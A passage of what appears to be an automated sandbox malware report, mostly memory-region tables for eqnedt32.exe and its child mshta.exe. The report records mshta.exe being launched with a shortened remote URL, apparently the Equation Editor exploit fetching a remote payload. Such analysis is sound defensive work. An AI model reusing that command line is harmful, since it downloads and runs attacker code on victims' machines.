| api-ms-win-crt-heap-l1-1-0.dll | 0x7fefabb0000 | 0x7fefabb2fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-string-l1-1-0.dll | 0x7fefabc0000 | 0x7fefabc3fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-file-l1-2-0.dll | 0x7fefabd0000 | 0x7fefabd2fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-processthreads-l1-1-1.dll | 0x7fefabe0000 | 0x7fefabe2fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x7fefabf0000 | 0x7fefabf2fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-localization-l1-2-0.dll | 0x7fefac00000 | 0x7fefac02fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-file-l2-1-0.dll | 0x7fefac10000 | 0x7fefac12fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-timezone-l1-1-0.dll | 0x7fefac20000 | 0x7fefac22fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7fefac30000 | 0x7fefad21fff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-crt-runtime-l1-1-0.dll | 0x7fefad30000 | 0x7fefad33fff | Memory Mapped File | rwx |
|
|
|
- |
| vcruntime140.dll | 0x7fefad40000 | 0x7fefad55fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7fefbee0000 | 0x7fefbef0fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7fefc080000 | 0x7fefc097fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x7fefc290000 | 0x7fefc4a4fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7fefdb30000 | 0x7fefdb6cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7fefdc30000 | 0x7fefdc3efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7fefdd20000 | 0x7fefdd59fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7fefddf0000 | 0x7fefdf56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffaa000 | 0x7fffffaa000 | 0x7fffffabfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd4000 | 0x7fffffd4000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd6000 | 0x7fffffd6000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 144 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #3: eqnedt32.exe
0
0
| Information | Value |
|---|---|
| ID | #3 |
| File Name | c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\equation\eqnedt32.exe |
| Command Line | "C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:03, Reason: RPC Server |
| Unmonitor | End Time: 00:01:22, Reason: Crashed |
| Monitor Duration | 00:00:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd4 |
| Parent PID | 0x258 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BD8
0x
BDC
0x
BE0
0x
BE4
0x
BE8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00350000 | 0x003b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| eqnedt32.exe | 0x00400000 | 0x0048dfff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00617fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x007c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x01bcffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01bd0000 | 0x01e9efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ea0000 | 0x01ea0000 | 0x02292fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000022a0000 | 0x022a0000 | 0x0237efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002380000 | 0x02380000 | 0x023bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x023dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023e0000 | 0x023e0000 | 0x024dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000024e0000 | 0x024e0000 | 0x0251ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002520000 | 0x02520000 | 0x0255ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002580000 | 0x02580000 | 0x0258ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002990000 | 0x02990000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02acffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b10000 | 0x02b10000 | 0x02b4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b50000 | 0x02b50000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02dcffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02dd0000 | 0x02e8ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002f60000 | 0x02f60000 | 0x02f9ffff | Private Memory | rw |
|
|
|
- |
| eeintl.dll | 0x3de20000 | 0x3de2dfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000006fe20000 | 0x6fe20000 | 0x6fe2ffff | Private Memory | rwx |
|
|
|
- |
| msi.dll | 0x74b10000 | 0x74d4ffff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x750a0000 | 0x750dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750e0000 | 0x750f5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75100000 | 0x75183fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75190000 | 0x751a6fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x75290000 | 0x75292fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75350000 | 0x7535dfff | Memory Mapped File | rwx |
|
|
|
- |
| c2r32.dll | 0x75360000 | 0x754d8fff | Memory Mapped File | rwx |
|
|
|
- |
| appvisvsubsystems32.dll | 0x754e0000 | 0x75697fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Process #4: mshta.exe
499
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\syswow64\mshta.exe |
| Command Line | C:\Windows\SysWOW64\mshta.exe https://urlz.fr/8gYe &AAAAAAAAAAAAAAAAC |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:01:18, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf0 |
| Parent PID | 0xbd4 (c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\equation\eqnedt32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BF4
0x
BFC
0x
808
0x
804
0x
14C
0x
698
0x
740
0x
144
0x
79C
0x
2B0
0x
82C
0x
838
0x
584
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| mshta.exe.mui | 0x000e0000 | 0x000e0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0017ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00180fff | Pagefile Backed Memory | rw |
|
|
|
- |
| index.dat | 0x00190000 | 0x0019bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x001a0000 | 0x001a7fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x001f0000 | 0x001fffff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00200000 | 0x0023ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000340000 | 0x00340000 | 0x004c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x0062efff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x00630fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000640000 | 0x00640000 | 0x00640fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x00650000 | 0x00650fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x00650fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x00661fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000670000 | 0x00670000 | 0x00671fff | Pagefile Backed Memory | r |
|
|
|
- |
| mshta.exe | 0x00680000 | 0x0068efff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0091ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x00921fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x00930fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x00930fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x00aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x009cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x009bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x009affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x009cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a70000 | 0x00a70000 | 0x00aaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00adffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x01edffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x01faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fc0000 | 0x01fc0000 | 0x01ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0212ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02130000 | 0x023fefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002400000 | 0x02400000 | 0x02742fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002750000 | 0x02750000 | 0x028cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027c0000 | 0x027c0000 | 0x027fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002830000 | 0x02830000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002890000 | 0x02890000 | 0x028cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x02abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b90000 | 0x02b90000 | 0x02c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e50000 | 0x02e50000 | 0x02f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x031affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003200000 | 0x03200000 | 0x032fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003350000 | 0x03350000 | 0x0344ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003580000 | 0x03580000 | 0x0367ffff | Private Memory | rw |
|
|
|
- |
| npmproxy.dll | 0x74480000 | 0x74487fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x74490000 | 0x74494fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x744a0000 | 0x744dbfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x744e0000 | 0x74539fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x74540000 | 0x74545fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x74550000 | 0x7455ffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x74560000 | 0x74565fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x74570000 | 0x745c1fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x745f0000 | 0x7478dfff | Memory Mapped File | rwx |
|
|
|
- |
| mshtml.dll | 0x74790000 | 0x74d46fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x74f80000 | 0x74f8cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x74f90000 | 0x74fa4fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74fb0000 | 0x74fb6fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74fc0000 | 0x74fdbfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74fe0000 | 0x75023fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x75030000 | 0x75050fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x75060000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| msls31.dll | 0x75070000 | 0x75099fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x750a0000 | 0x750dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750e0000 | 0x750f5fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75190000 | 0x751a6fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75350000 | 0x7535dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x75a00000 | 0x75a02fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x75cc0000 | 0x75cecfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x75f90000 | 0x75f94fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
